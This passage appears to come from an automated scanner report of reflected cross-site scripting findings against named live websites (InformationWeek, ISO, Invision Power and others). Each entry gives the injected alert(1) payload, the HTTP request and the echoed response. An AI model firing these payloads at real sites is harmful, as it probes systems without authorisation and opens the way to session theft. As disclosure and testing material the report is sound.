User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=5769ntf04fe1keua3of75j7eb7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<option value='onlineOrderStatusRegistration.php?6cceb'><script>alert(1)</script>0baa5dff093=1'>
...[SNIP]...

3.58. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/vulnerabilities/showArticle.jhtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fd71"><script>alert(1)</script>662c06a49bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news9fd71"><script>alert(1)</script>662c06a49bf/security/vulnerabilities/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:36:40 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 28 Feb 2011 13:36:40 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=ZRITCOKHS11WRQE1GHPSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32589


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_Vulnerabilities_Welcome_Ad_1x1;key=/news9fd71"><script>alert(1)</script>662c06a49bf/security/v;kvarticleid=;kvauthor=;loc=300;grp=351939023" target="_blank">
...[SNIP]...

3.59. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/vulnerabilities/showArticle.jhtml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41182'-alert(1)-'caabbc3a43a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news41182'-alert(1)-'caabbc3a43a/security/vulnerabilities/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:36:40 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 28 Feb 2011 13:36:40 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=CZNYUP4NWYEMNQE1GHRSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32539


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_Vulnerabilities_Welcome_Ad_1x1;key=/news41182'-alert(1)-'caabbc3a43a/security/vulnerabilities/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=959819525;misc='+new Date().getTime()+'">
...[SNIP]...

3.60. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/vulnerabilities/showArticle.jhtml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f5ea'-alert(1)-'3269f48a722 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/security5f5ea'-alert(1)-'3269f48a722/vulnerabilities/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:36:42 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 28 Feb 2011 13:36:42 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=KDYX0HPPOLIUHQE1GHOSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 31904


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/security5f5ea'-alert(1)-'3269f48a722/vulnerabilities/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=195738155;misc='+new Date().getTime()+'">
...[SNIP]...

3.61. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/vulnerabilities/showArticle.jhtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0c6b"><script>alert(1)</script>52f47d039f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/securityf0c6b"><script>alert(1)</script>52f47d039f8/vulnerabilities/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:36:42 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 28 Feb 2011 13:36:42 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=XE51FFWNXUJD1QE1GHRSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 31954


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/securityf0c6b"><script>alert(1)</script>52f47d039f8/v;kvarticleid=;kvauthor=;loc=300;grp=283268530" target="_blank">
...[SNIP]...

3.62. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.informationweek.com
Path:   /news/security/vulnerabilities/showArticle.jhtml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49a76"><a%20b%3dc>6fa13ace0c8 was submitted in the REST URL parameter 3. This input was echoed as 49a76"><a b=c>6fa13ace0c8 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news/security/vulnerabilities49a76"><a%20b%3dc>6fa13ace0c8/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:36:44 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 28 Feb 2011 13:36:44 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=AJWTWR1FR30WBQE1GHRSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32529


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_Vulnerabilities_Welcome_Ad_1x1;key=/news/security/vulnerabilities49a76"><a b=c>6fa13ace0c8/sho;kvarticleid=;kvauthor=;loc=300;grp=599724500" target="_blank">
...[SNIP]...

3.63. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/vulnerabilities/showArticle.jhtml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a3a7'-alert(1)-'9eba2051cd4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/security/vulnerabilities7a3a7'-alert(1)-'9eba2051cd4/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:36:46 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 28 Feb 2011 13:36:46 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=1AIMFW3SEBOLLQE1GHPSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32515


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
e="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_Vulnerabilities_Welcome_Ad_1x1;key=/news/security/vulnerabilities7a3a7'-alert(1)-'9eba2051cd4/;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=478137327;misc='+new Date().getTime()+'">
...[SNIP]...

3.64. http://www.intranetjournal.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intranetjournal.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e7d71--><script>alert(1)</script>44f0d2ca1d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e7d71--><script>alert(1)</script>44f0d2ca1d7=1 HTTP/1.1
Host: www.intranetjournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:29:37 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Mon, 28 Feb 2011 13:30:37 GMT
Connection: close
Content-Type: text/html
Content-Length: 148285


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.intranetjournal.com with position M0
url: /?e7d71--><script>alert(1)</script>44f0d2ca1d7=1 -->
...[SNIP]...

3.65. http://www.invisionpower.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1c915<script>alert(1)</script>1cf63e69e40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?1c915<script>alert(1)</script>1cf63e69e40=1 HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Cache-Control: no-cache, must-revalidate, max-age=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Invision Power Services :: 404 File Not Found</ti
...[SNIP]...
<br />
/index.php?1c915<script>alert(1)</script>1cf63e69e40=1
</div>
...[SNIP]...

3.66. http://www.iso.org/iso/catalogue_detail.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.iso.org
Path:   /iso/catalogue_detail.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 616d8"><script>alert(1)</script>0bec531230b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iso/catalogue_detail.htm?616d8"><script>alert(1)</script>0bec531230b=1 HTTP/1.1
Host: www.iso.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:44 GMT
Server: Apache/2.2.11 (Unix)
Last-Modified: Mon, 28 Feb 2011 03:00:00 GMT
ETag: "11ada659-01010000"
Expires: Tue, 01 Mar 2011 03:00:00 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 10079
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
<base href="http://www.
...[SNIP]...
<a href="iso_catalogue/catalogue_tc/catalogue_detail.htm?lang=4&616d8"><script>alert(1)</script>0bec531230b=1" title="Version fran..aise" style="font-weight:bold">
...[SNIP]...

3.67. http://www.isp-planet.com/about/sitemap.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /about/sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 51f31--><script>alert(1)</script>4c2513c3044 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/sitemap.html?51f31--><script>alert(1)</script>4c2513c3044=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:48:55 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Mon, 28 Feb 2011 13:49:55 GMT
Connection: close
Content-Type: text/html
Content-Length: 65822


<HTML>
<HEAD>
<TITLE>ISP-Planet - Welcome</TITLE>
<META name="description" content="ISP-Planet has business and marketing advice for ISPs, plus specialized isp information resources. It reports on IS
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /about/sitemap.html?51f31--><script>alert(1)</script>4c2513c3044=1 -->
...[SNIP]...

3.68. http://www.itwhitepapers.com/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itwhitepapers.com
Path:   /index.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c2ed"-alert(1)-"0b6b2e62c71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php1c2ed"-alert(1)-"0b6b2e62c71 HTTP/1.1
Host: www.itwhitepapers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 28 Feb 2011 13:37:02 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=gj8orm2sv42en85k152rk84pf6; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: 2f1511d467aa3beecdd06ea6e9b79919=b1974b4123f9173afbc8d8ddf98c0f5d; expires=Tue, 28-Feb-2012 13:37:02 GMT; path=/
Last-Modified: Mon, 28 Feb 2011 13:37:03 GMT
Cache-Control: post-check=0, pre-check=0
P3P: CP="ALL DSP NID CUR OUR STP STA"
Connection: close
Content-Type: text/html; charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
each page an identifying name, server, and channel on
the next lines. */
s.pageName=""
s.server="www.itwhitepapers.com"
s.channel=""
s.pageType=""
s.prop1="http://www.itwhitepapers.com/index.php1c2ed"-alert(1)-"0b6b2e62c711"
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.e
...[SNIP]...

3.69. http://www.itwhitepapers.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itwhitepapers.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 285b5"-alert(1)-"ceff258512b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?285b5"-alert(1)-"ceff258512b=1 HTTP/1.1
Host: www.itwhitepapers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 28 Feb 2011 13:36:49 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=jka00njg04ta06a00nkknkdhl0; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: 2f1511d467aa3beecdd06ea6e9b79919=cd33582342750b310de1b92f6cbe5b62; expires=Tue, 28-Feb-2012 13:36:49 GMT; path=/
Last-Modified: Mon, 28 Feb 2011 13:36:49 GMT
Cache-Control: post-check=0, pre-check=0
P3P: CP="ALL DSP NID CUR OUR STP STA"
Connection: close
Content-Type: text/html; charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
each page an identifying name, server, and channel on
the next lines. */
s.pageName=""
s.server="www.itwhitepapers.com"
s.channel=""
s.pageType=""
s.prop1="http://www.itwhitepapers.com/index.php?285b5"-alert(1)-"ceff258512b=11"
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""
s.eVar1=""
s.eVar2=""
s.eVar3=""
s
...[SNIP]...

3.70. http://www.japan-guide.com/e/e2164.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japan-guide.com
Path:   /e/e2164.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 518ff><script>alert(1)</script>fdb979a18c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e/e2164.html?518ff><script>alert(1)</script>fdb979a18c2=1 HTTP/1.1
Host: www.japan-guide.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 28 Feb 2011 13:36:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: jgid_ip=173.193.214.243; path=/
Set-Cookie: jgid_time=1298900203; path=/
Set-Cookie: geo_c=4; path=/
Set-Cookie: geo_country_c=US; path=/
Connection: close
Content-Type: text/html;charset=shift-jis


<html><head>
<title>Tokyo - City Guide</title>
<meta name=description content="About the city of Tokyo, Japan.">
<meta name=keywords content="tokyo, guide, travel, tourism, sightseeing, tourist">
...[SNIP]...
<a href=http://www.japan-guide.com/m/login.html?aACTION=url&aURL=/e/e2164.htmlxQUE518ff><script>alert(1)</script>fdb979a18c2xEQ1 target=_top rel="nofollow">
...[SNIP]...

3.71. http://www.jazdtech.com/techdirect/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jazdtech.com
Path:   /techdirect/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7be38'-alert(1)-'20bea5f77e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /techdirect/?7be38'-alert(1)-'20bea5f77e1=1 HTTP/1.1
Host: www.jazdtech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:59 GMT
Set-Cookie: JazdSession="c8a4f491-794d-47ad-b6a6-bb2752474302:1298900219117"; Version=1; Max-Age=3600; Expires=Mon, 28-Feb-2011 14:36:59 GMT; Path=/
Set-Cookie: JazdTestCookie=1298900219117; Expires=Tue, 28-Feb-2012 13:36:59 GMT; Path=/
Set-Cookie: JSESSIONID=892612E41933A5C0B6AA68A9D78215B7; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Length: 78325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META name=
...[SNIP]...
<a href="http://www.jazdtech.com/techdirect/morePartnerRSSPage.htm?parentPageType=1&contentSetId=60019907&7be38'-alert(1)-'20bea5f77e1=1" class="more_button">
...[SNIP]...

3.72. http://www.jazdtech.com/techdirect/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jazdtech.com
Path:   /techdirect/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9122b"><script>alert(1)</script>0a7fdd666d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /techdirect/?9122b"><script>alert(1)</script>0a7fdd666d5=1 HTTP/1.1
Host: www.jazdtech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:56 GMT
Set-Cookie: JazdSession="9d49105c-52be-4d2c-bb47-efd2a80aad21:1298900216277"; Version=1; Max-Age=3600; Expires=Mon, 28-Feb-2011 14:36:56 GMT; Path=/
Set-Cookie: JazdTestCookie=1298900216277; Expires=Tue, 28-Feb-2012 13:36:56 GMT; Path=/
Set-Cookie: JSESSIONID=6516307643D32BF43D843CD6904A396E; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Length: 79398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META name=
...[SNIP]...
<a href="http://www.jazdtech.com/techdirect/moreResearchLibraryPage.htm?parentPageType=1&9122b"><script>alert(1)</script>0a7fdd666d5=1">
...[SNIP]...

3.73. http://www.kitchendaily.com/chefs/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kitchendaily.com
Path:   /chefs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbd2e"><script>alert(1)</script>e79a3fd9cf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /chefs/?dbd2e"><script>alert(1)</script>e79a3fd9cf8=1 HTTP/1.1
Host: www.kitchendaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:49 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999988
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 52227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
<title>Chefs & Cooking Exp
...[SNIP]...
<link rel="canonical" href="http://www.kitchendaily.com/chefs/?dbd2e"><script>alert(1)</script>e79a3fd9cf8=1" />
...[SNIP]...

3.74. http://www.kledy.co.uk/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kledy.co.uk
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 730b3"><script>alert(1)</script>4e79c28eac3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?730b3"><script>alert(1)</script>4e79c28eac3=1 HTTP/1.1
